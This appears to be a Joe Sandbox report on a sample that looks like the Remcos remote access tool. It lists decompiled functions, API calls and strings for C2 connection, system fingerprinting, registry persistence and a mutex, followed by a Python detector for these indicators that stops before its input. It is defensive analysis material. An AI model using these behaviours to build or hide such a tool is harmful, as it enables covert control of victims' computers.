                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                              • API String ID: 2281282204-3981147832
                              • Opcode ID: f1e844b88154ea7f944469d923261dc4d8bc71d11c32eb7a6dd001ac4c6178c6
                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                              • Opcode Fuzzy Hash: f1e844b88154ea7f944469d923261dc4d8bc71d11c32eb7a6dd001ac4c6178c6
                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                              Control-flow Graph

                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 00404946
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$EventLocalThreadTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 2532271599-1507639952
                              • Opcode ID: 9dba7f291707fb6dee9b06b989ff2bbd9281d571ddecfbbe513a7e639189b983
                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                              • Opcode Fuzzy Hash: 9dba7f291707fb6dee9b06b989ff2bbd9281d571ddecfbbe513a7e639189b983
                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                              APIs
                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Crypt$Context$AcquireRandomRelease
                              • String ID:
                              • API String ID: 1815803762-0
                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                              APIs
                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser
                              • String ID:
                              • API String ID: 4229901323-0
                              • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                              • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                              Control-flow Graph

                              APIs
                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                              • WSAGetLastError.WS2_32 ref: 00414249
                              • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$ErrorLastLocalTime
                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-4NJUM7$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$hlight$name$x~^$>G$>G$BG
                              • API String ID: 524882891-3600714904
                              • Opcode ID: 306e3275ecf728a0cc16654e9991bc6b244861bfc2fed230cbb40395f1280921
                              • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                              • Opcode Fuzzy Hash: 306e3275ecf728a0cc16654e9991bc6b244861bfc2fed230cbb40395f1280921
                              • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                              Control-flow Graph

                              APIs
                              • connect.WS2_32(?,?,?), ref: 004042A5
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                              • API String ID: 994465650-2151626615
                              • Opcode ID: 0f377626e57d5989f5b80ec65bcbc170c14374621a219e0cafb3a46d672615dd
                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                              • Opcode Fuzzy Hash: 0f377626e57d5989f5b80ec65bcbc170c14374621a219e0cafb3a46d672615dd
                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                              Control-flow Graph

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                              • closesocket.WS2_32(000000FF), ref: 0040481F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                              • String ID:
                              • API String ID: 3658366068-0
                              • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                              • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                              Control-flow Graph

                              control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac0f 1019->1026 1027 40c8da-40c8e8 call 41a74b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b15b 1019->1030 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1032 40c9dd-40c9e2 call 43ac0f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1050 40c8ed 1027->1050 1028->1032 1029->1032 1042 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1042 1043 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1043 1044 40c9e3-40c9e8 call 4082d7 1032->1044 1038->1025 1038->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                              APIs
                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-425784914
                              • Opcode ID: b96183e0479dfb7e206373740ca3f2c2a81a4b44f37acafcab42729827570eb6
                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                              • Opcode Fuzzy Hash: b96183e0479dfb7e206373740ca3f2c2a81a4b44f37acafcab42729827570eb6
                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              • API String ID: 782494840-2070987746
                              • Opcode ID: 86bbcbdce1bcc566ec4c7eb9c3f3f89489dcb65e6470f8cc487b0f9213cf0882
                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                              • Opcode Fuzzy Hash: 86bbcbdce1bcc566ec4c7eb9c3f3f89489dcb65e6470f8cc487b0f9213cf0882
                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                              Control-flow Graph

                              control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1172 412724-412730 call 401eea 1170->1172 1171->1172
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                              • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                              • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: HgF$pth_unenc
                              • API String ID: 1818849710-3662775637
                              • Opcode ID: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                              • Opcode Fuzzy Hash: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                              Control-flow Graph

                              control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: TUF
                              • API String ID: 1818849710-3431404234
                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                              Control-flow Graph

                              control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                              APIs
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                              • GetLastError.KERNEL32 ref: 0040BEF1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutex
                              • String ID: Rmc-4NJUM7
                              • API String ID: 1925916568-416662562
                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
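The listings above carry the behaviours a detection engineer would extract from this report: the registry-write function opens a key under HKEY_CURRENT_USER (0x80000001 as the first RegCreateKeyA argument) and writes a value with RegSetValueExA, the CreateMutexA function carries the mutex name Rmc-4NJUM7, and the main loop's String ID holds the "5.3.0 Pro" version marker and the "TLS On"/"TLS Off" toggles of the C2 connection routine. The Python below is an added example; it is not part of the Joe Sandbox report nor code from the analysed sample. It parses API-call bullets and String ID fields in the format used on this page and applies those checks. The sample fragments are copied from the listings above and labelled as constructed input, the rule names are the example's own, and a read-only registry query (the RegOpenKeyExA/RegQueryValueExA function above) is included as a control so the write check can be seen not to fire on it.

```python
"""Added example (not part of the Joe Sandbox report or of the analysed sample):
parse the report's API-call bullets and 'String ID' fields and apply a few
behaviour checks derived from the function listings on this page."""
import re
from dataclasses import dataclass
from typing import Iterable

HKEY_CURRENT_USER = 0x80000001  # hive handle passed as first argument to RegCreateKeyA/RegOpenKeyExA

# "Api.Module(arg,arg,...), ref: 0040BEE6"  or, without arguments, "Api.Module ref: 0040BEF1"
_API_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
# Nested calls are listed as "Part of subcall function 0041A686: GetLocalTime.KERNEL32(...), ref: ..."
_SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")
# Edition/version string as it appears in the RegSetValueExA arguments above ("5.3.0 Pro")
_VERSION_RE = re.compile(r"\b\d+\.\d+\.\d+ Pro\b")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int


def _clean(raw: str) -> str:
    """Drop the bullet, surrounding whitespace and the 'Part of subcall function' prefix."""
    return _SUBCALL_RE.sub("", raw.strip().lstrip("•").strip())


def parse_api_line(line: str) -> ApiCall:
    """Parse one API bullet into (api, module, argument tuple, reference address)."""
    m = _API_RE.match(_clean(line))
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def parse_string_id(field: str) -> list:
    """'$' separates the strings of a 'String ID' field; padding inside a string is kept."""
    return [s for s in field.split("$") if s != ""]


def _arg_is(call: ApiCall, index: int, value: int) -> bool:
    """Compare a hex argument; '?' marks an argument the analyser could not resolve."""
    try:
        return int(call.args[index], 16) == value
    except (IndexError, ValueError):
        return False


def detect(calls: Iterable[ApiCall], strings: Iterable[str]) -> set:
    """Apply the four checks (rule names are this example's own) and return the ones that fire."""
    calls, strings = list(calls), list(strings)
    apis = {c.api for c in calls}
    stripped = {s.strip() for s in strings}
    hits = set()
    # 1. A key under HKEY_CURRENT_USER is created/opened and a value is written
    if "RegSetValueExA" in apis and any(
        c.api in ("RegCreateKeyA", "RegOpenKeyExA") and _arg_is(c, 0, HKEY_CURRENT_USER) for c in calls
    ):
        hits.add("hkcu_registry_write")
    # 2. CreateMutexA together with a mutex name using the "Rmc-" prefix seen on this page
    if "CreateMutexA" in apis and any(s.startswith("Rmc-") for s in stripped):
        hits.add("rmc_mutex")
    # 3. Embedded edition/version string
    if any(_VERSION_RE.search(s) for s in strings):
        hits.add("remcos_version_string")
    # 4. Both TLS toggle strings of the C2 connection routine
    if {"TLS On", "TLS Off"} <= stripped:
        hits.add("tls_toggle_strings")
    return hits


def scan_report(text: str) -> set:
    """Run the checks over a pasted report fragment: API bullets plus 'String ID:' lines."""
    calls, strings = [], []
    for raw in text.splitlines():
        line = _clean(raw)
        if line.startswith("String ID:"):
            strings.extend(parse_string_id(line[len("String ID:"):].strip()))
        elif _API_RE.match(line):
            calls.append(parse_api_line(line))
    return detect(calls, strings)


# Constructed input: lines copied from the listings above (mutex, registry-write and main-loop functions).
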